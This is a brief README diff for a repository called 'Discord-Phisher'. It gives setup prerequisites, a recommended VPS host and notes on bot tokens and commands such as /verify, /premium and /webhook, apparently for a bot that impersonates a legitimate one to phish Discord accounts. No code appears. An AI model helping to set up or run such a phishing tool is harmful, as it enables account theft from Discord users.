fuzzlesfixer/Discord-Phisher/README.md

 # Discord-Phisher
+# Must have pip, python and git. vultr is recomended vps

 # Bot token is for /verify /premium and /view profile
 # Gen token has /webhook and /start so it would be your skyhelper bot